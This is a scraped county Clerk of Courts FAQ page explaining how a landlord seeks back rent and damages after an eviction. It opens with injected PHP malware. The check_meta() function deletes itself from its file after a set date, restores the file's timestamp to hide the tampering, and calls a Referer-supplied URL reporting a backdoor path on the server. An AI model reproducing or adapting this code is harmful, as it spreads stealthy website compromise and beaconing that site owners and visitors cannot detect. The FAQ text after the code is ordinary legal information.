check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } How do I seek back rent?
Home Eviction FAQ's How do I seek back rent?

More... Quick Links

How do I seek back rent?

When a complaint contains a claim for back rent and damages, the defendant has 20 days to
answer that part of the Eviction. After the landlord receives possession of the property and
determines what their damages are, they can file an Affidavit as to damages. This form can
be obtained from the Clerk's Office, County Civil Division. The landlord will mail a copy of the
completed form to the Tenant. The judge will schedule a court hearing and, after testimony,
determine if a judgment should be awarded. If you are awarded a judgment you may obtain
information on how to collect it here.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.